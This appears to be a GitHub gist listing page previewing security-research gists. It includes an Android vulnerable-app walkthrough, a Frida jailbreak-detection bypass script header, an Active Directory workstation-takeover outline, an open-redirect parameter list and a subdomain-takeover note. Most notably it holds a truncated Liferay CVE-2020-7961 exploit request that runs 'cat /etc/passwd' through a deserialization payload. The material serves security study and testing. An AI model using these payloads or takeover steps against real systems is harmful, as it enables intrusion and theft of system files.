MichaellCader michaellcader

@ruevaughn
ruevaughn / InsecureBankV2.tutorial.md
Last active September 27, 2024 09:29
InsecureBankV2 Android App Walkthrough

InsecureBankV2 Tutorial

This is a writeup of my solutions to the intentionally vulnerable Android app. If you want to solve the challenge yourself, you can download the APK from here. In most cases I recommend trying the challenge yourself first before reading the solution. If you are new to testing Android applications or vulnerability assessment in general, you may gain more out of it by reading and then attempting. Do what works for you.

Setup


Follow my Blog Post for instructions on setting up this lab or follow the instructions here. First we are going to cover the tools utilized and how to set them up, then I am going to cover the vulnerabilities found in this App.

@izadgot
izadgot / ios-jailbreak-detection-bypass.js
Last active February 24, 2025 22:31
This is a Frida script used for bypassing iOS jailbreak detection by hooking the following methods/functions: fileExistsAtPath, fopen, canOpenURL, libSystemBFork
//Moved to https://github.com/Incognito-Lab/Frida-iOS-Jailbreak-detection-bypass
/*
This is a Frida script used for bypassing iOS jailbreak detection by hooking the following methods/functions
- fileExistsAtPath
- fopen
- canOpenURL
- libSystemBFork
This script is a modified version of Objection script: https://github.com/sensepost/objection/blob/master/agent/src/ios/jailbreak.ts
@gladiatx0r
gladiatx0r / Workstation-Takeover.md
Last active March 17, 2025 03:05
From RPC to RCE - Workstation Takeover via RBCD and MS-RPChoose-Your-Own-Adventure

Overview

In the default configuration of Active Directory, it is possible to remotely take over workstations (Windows 7/10/11) and possibly servers (if Desktop Experience is installed) when their WebClient service is running. In short, this is accomplished by:

  • Triggering machine authentication over HTTP via either MS-RPRN or MS-EFSRPC (as demonstrated by @tifkin_). This requires a set of credentials for the RPC call.
  • Relaying that machine authentication to LDAPS for configuring RBCD
  • RBCD takeover

The caveat to this is that the WebClient service does not automatically start at boot. However, if the WebClient service has been triggered to start on a workstation (for example, via some SharePoint interactions), you can remotely take over that system. In addition, there are several ways to coerce the WebClient service to start remotely which I cover in a section below.

&return=/return
&return_url=/return_url
&returnurl=/returnurl
&redirect=/redirect
&redirect_url=redirect_url
&redirect_uri=redirect_uri
&redirecturl=redirecturl
&next=/next
&next_url=/next_url
&next_uri=/next_uri
@1nikolas
1nikolas / genymotion-4.x.md
Last active January 23, 2025 02:30
Install Android 4.1, 4.2, 4.3 on Genymotion

Install Android 4.1, 4.2, 4.3 on Genymotion

I found a way to install older Android versions (4.x) on the latest version of Genymotion. I only tested it on Windows but it should work on Mac and Linux too. So here is what you need to do:

Step 1

Download the required Android image. I've reuploaded the files to Mega and saved them on the WayBack Machine.

@TheBinitGhimire
TheBinitGhimire / README.md
Last active October 27, 2024 19:26
Dangling DNS Records leading to Sub-domain Takeover on api.techprep.fb.com!

Dangling DNS Records on api.techprep.fb.com - $500!

Read the proper write-up here: https://publish.whoisbinit.me/subdomain-takeover-on-api-techprep-fb-com-through-aws-elastic-beanstalk

I have included my script in another file (main.sh), which I used in discovering this vulnerability.

I didn't do any form of manual work in finding this vulnerability, and my workflow was fully automated with Bash scripting.

I have shortened my actual script, and only included the part which helped me in finding this vulnerability in the main.sh file.

@pikpikcu
pikpikcu / LiferayRCE(CVE-2020-7961).md
Last active September 9, 2022 03:46
POC Liferay RCE(CVE-2020-7961)
POST /api/jsonws/invoke HTTP/1.1
Host: REDACTED
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:68.0) Gecko/20100101 Firefox/68.0
cmd2: cat /etc/passwd
Content-Type: application/x-www-form-urlencoded
Content-Length: 4956
Connection: close

cmd=%7B%22%2Fexpandocolumn%2Fupdate-column%22%3A%7B%7D%7D&p_auth=%3Cvalid+token%3E&formDate=%3Cdate%3E&columnId=123&name=asdasd&type=1&defaultData%3Acom.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap
@m4ll0k
m4ll0k / gist:9cf22d4c76dbe0e1a0cc874f12c04963
Created January 28, 2021 20:56 — forked from cjaoude/gist:fd9910626629b53c4d25
Test list of Valid and Invalid Email addresses
Use: for testing against email regex
ref: http://codefool.tumblr.com/post/15288874550/list-of-valid-and-invalid-email-addresses
List of Valid Email Addresses
[email protected]
[email protected]
[email protected]
[email protected]